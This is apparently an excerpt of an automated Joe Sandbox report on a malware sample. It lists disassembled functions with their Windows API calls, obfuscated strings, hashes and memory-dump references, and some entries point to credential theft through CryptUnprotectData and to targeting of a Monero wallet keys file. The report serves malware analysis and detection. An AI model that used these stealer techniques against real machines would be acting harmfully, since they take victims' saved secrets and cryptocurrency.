                                    • Opcode ID: 9e2b2e2b0bd904e89eef5044bd9a5685415a94f412754811c6b281bcbcfa7b01
                                    • Instruction ID: 9e1d08e10b0518da7f36f04a2cab38fa078e8c7f3b8fb7d70b4a10e8d8bbd4b8
                                    • Opcode Fuzzy Hash: 9e2b2e2b0bd904e89eef5044bd9a5685415a94f412754811c6b281bcbcfa7b01
                                    • Instruction Fuzzy Hash: ACB2F7F3A082049FE304AE2DEC8576AFBE9EF94720F1A853DEAC4C7744E53558058796
                                    Function 000E7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                    • GetKeyboardLayoutList.USER32(00000000,00000000,000F05AF), ref: 000E7BE1
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 000E7BF9
                                    • GetKeyboardLayoutList.USER32(?,00000000), ref: 000E7C0D
                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 000E7C62
                                    • LocalFree.KERNEL32(00000000), ref: 000E7D22
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                    • String ID: /
                                    • API String ID: 3090951853-4001269591
                                    • Opcode ID: 2c72178ed41a21a8eb9f9c619e820677772f3895b10a79b28e13169f767d8e35
                                    • Instruction ID: e0c9b24f5c5c66be60e57eab1f95ad0563a48cf5323141ce7e9fa041871a8388
                                    • Opcode Fuzzy Hash: 2c72178ed41a21a8eb9f9c619e820677772f3895b10a79b28e13169f767d8e35
                                    • Instruction Fuzzy Hash: 85414971A01258AFDB24DB95DC89BEEB3B8FB48700F204199E10976192DB342F85CFA1
                                    Function 0049F40E Relevance: 10.4, Strings: 7, Instructions: 1679COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Rnu$;h7}$Fnuo$j~fG$qclY$rtn$zi{
                                    • API String ID: 0-409881537
                                    • Opcode ID: 15cd2d010edddbd122af02dc1ce9cb6f90779accdc65c1b7920053bc3dab6af6
                                    • Instruction ID: 146577e5746859d399e296fbadc350174da373336d8ed6430f2facf7382b4674
                                    • Opcode Fuzzy Hash: 15cd2d010edddbd122af02dc1ce9cb6f90779accdc65c1b7920053bc3dab6af6
                                    • Instruction Fuzzy Hash: B8B239F360C3049FE304AE2DEC9567ABBE9EF94720F16463DE6C4C3744EA7558018696
                                    Function 000DE430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                      • Part of subcall function 000EA920: lstrcpy.KERNEL32(00000000,?), ref: 000EA972
                                      • Part of subcall function 000EA920: lstrcat.KERNEL32(00000000), ref: 000EA982
                                      • Part of subcall function 000EA9B0: lstrlen.KERNEL32(?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000EA9C5
                                      • Part of subcall function 000EA9B0: lstrcpy.KERNEL32(00000000), ref: 000EAA04
                                      • Part of subcall function 000EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAA12
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,000F0D73), ref: 000DE4A2
                                    • StrCmpCA.SHLWAPI(?,000F14F8), ref: 000DE4F2
                                    • StrCmpCA.SHLWAPI(?,000F14FC), ref: 000DE508
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 000DEBDF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 433455689-1173974218
                                    • Opcode ID: 82585e73b8e30902db18f8256bb01da8f82b9b5d92630d02978c23e3726121fd
                                    • Instruction ID: 236470e3cac2951657fdd0384ac09ffe302121ea359398a50e9d102cf21fbc7a
                                    • Opcode Fuzzy Hash: 82585e73b8e30902db18f8256bb01da8f82b9b5d92630d02978c23e3726121fd
                                    • Instruction Fuzzy Hash: 71126D31A001589EDB18FB61DD96EED7339AF59300F4141A9B50AB6193EF307F49CBA2
                                    Function 0049D967 Relevance: 9.1, Strings: 6, Instructions: 1608COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 7$}$9?k?$Aiog$Ln=$o[\>${>}
                                    • API String ID: 0-2663664130
                                    • Opcode ID: 72f93571901978973c47ac5121d01cfc0fee5934ffcd57b0bd50902c3a70b92c
                                    • Instruction ID: d4126c8ef3cf9fbb4417ef80f4bfe97d0ef51c0e4d7b6bb9e97281f1f62c40e5
                                    • Opcode Fuzzy Hash: 72f93571901978973c47ac5121d01cfc0fee5934ffcd57b0bd50902c3a70b92c
                                    • Instruction Fuzzy Hash: D9B225F360C2049FE304AE2DEC8567ABBE9EF94320F16893DE6C4C7744E63598058697
                                    Function 000D9AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 000D9AEF
                                    • LocalAlloc.KERNEL32(00000040,?,?,?,000D4EEE,00000000,?), ref: 000D9B01
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 000D9B2A
                                    • LocalFree.KERNEL32(?,?,?,?,000D4EEE,00000000,?), ref: 000D9B3F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptLocalString$AllocFree
                                    • String ID: N
                                    • API String ID: 4291131564-4101671594
                                    • Opcode ID: 342072b1ddee2f77ab9a9a5343f12706a951df58b8f83b39b55d3c2cc1077e24
                                    • Instruction ID: 152805adb9516862453635837a2a4ea99b152f1cf2e13aa0edc21d1931d4cf00
                                    • Opcode Fuzzy Hash: 342072b1ddee2f77ab9a9a5343f12706a951df58b8f83b39b55d3c2cc1077e24
                                    • Instruction Fuzzy Hash: 9E11D4B4241308AFEB00CF64CC95FAA77B9FB89715F208049F9159B390C771A901CB50
                                    Function 004AE631 Relevance: 7.8, Strings: 5, Instructions: 1572COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: \}]m$j]w/$nt7$zj{$4Xa
                                    • API String ID: 0-334726920
                                    • Opcode ID: 8944e06c13effbdbf1747e3b722e02f6e5c2be44e9cf6540886055840417e6e9
                                    • Instruction ID: 67934872216c9e0c66193652fc11183fb29cb95cb9155646517d8cda35911c12
                                    • Opcode Fuzzy Hash: 8944e06c13effbdbf1747e3b722e02f6e5c2be44e9cf6540886055840417e6e9
                                    • Instruction Fuzzy Hash: 9BB2E2F3A0C2049FE304AE29EC8567AF7E9EF94720F16493DEAC5C7740E63598448697
                                    Function 000DC820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 000DC871
                                    • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 000DC87C
                                    • lstrcat.KERNEL32(?,000F0B46), ref: 000DC943
                                    • lstrcat.KERNEL32(?,000F0B47), ref: 000DC957
                                    • lstrcat.KERNEL32(?,000F0B4E), ref: 000DC978
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$BinaryCryptStringlstrlen
                                    • String ID:
                                    • API String ID: 189259977-0
                                    • Opcode ID: 4847e928e3236748f30701c9a2aa457a14bde205b01bcdcd5b3674010fe1a5d3
                                    • Instruction ID: 1088ae9868a952eade159863b931c06383fe599a80d8c7337f164f57f3f22080
                                    • Opcode Fuzzy Hash: 4847e928e3236748f30701c9a2aa457a14bde205b01bcdcd5b3674010fe1a5d3
                                    • Instruction Fuzzy Hash: 5A416E7990421EDFDB10DFA0DD89BFEF7B8AB48305F1041A9E609A6280D7705A85CFA1
                                    Function 000E6920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSystemTime.KERNEL32(?), ref: 000E696C
                                    • sscanf.NTDLL ref: 000E6999
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 000E69B2
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 000E69C0
                                    • ExitProcess.KERNEL32 ref: 000E69DA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Time$System$File$ExitProcesssscanf
                                    • String ID:
                                    • API String ID: 2533653975-0
                                    • Opcode ID: aed4c78c206e47549af2c983ff89aec61227d6132fd07c18139d931521d00d47
                                    • Instruction ID: fca47f08656caec2b8a11a5c0b6f008704ca13ff2c8dbc4d9d3169d57f56eb0b
                                    • Opcode Fuzzy Hash: aed4c78c206e47549af2c983ff89aec61227d6132fd07c18139d931521d00d47
                                    • Instruction Fuzzy Hash: B221EA75D10208AFCF05EFE4E9459EEB7B9BF4C301F04852AE406B3251EB355605CB65
                                    Function 000D7240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 000D724D
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000D7254
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 000D7281
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 000D72A4
                                    • LocalFree.KERNEL32(?), ref: 000D72AE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                    • String ID:
                                    • API String ID: 2609814428-0
                                    • Opcode ID: f5bca64d642ad3ad3e29e9c43118725da9e5b6da84f21befcdf46dc3197e6d08
                                    • Instruction ID: 4be24e3ed0b8ffb69ab85bcf00eaf183ec8599af5b5a4e75041fb37d237a7d62
                                    • Opcode Fuzzy Hash: f5bca64d642ad3ad3e29e9c43118725da9e5b6da84f21befcdf46dc3197e6d08
                                    • Instruction Fuzzy Hash: 9C011275A41308BBEB10DFD8CD45FEE77B8EB48701F108155FB05AB2C0D670AA008B65
                                    Function 000E9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000E961E
                                    • Process32First.KERNEL32(000F0ACA,00000128), ref: 000E9632
                                    • Process32Next.KERNEL32(000F0ACA,00000128), ref: 000E9647
                                    • StrCmpCA.SHLWAPI(?,00000000), ref: 000E965C
                                    • CloseHandle.KERNEL32(000F0ACA), ref: 000E967A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 420147892-0
                                    • Opcode ID: 3df19ee1163632635fe72e14811dfb9e27c1725658c0270ec2def9f526342199
                                    • Instruction ID: 8d503dc4b6d77a3f5c6dd1da5da35061e8bffda9c1372adef7502f4650fb349f
                                    • Opcode Fuzzy Hash: 3df19ee1163632635fe72e14811dfb9e27c1725658c0270ec2def9f526342199
                                    • Instruction Fuzzy Hash: ED011E75A11208EFCB25DFA5CD48BEDBBF8EB4C301F10819AA905A7290D7349B40DF51
                                    Function 004AB1D9 Relevance: 6.6, Strings: 4, Instructions: 1582COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmpDownload File
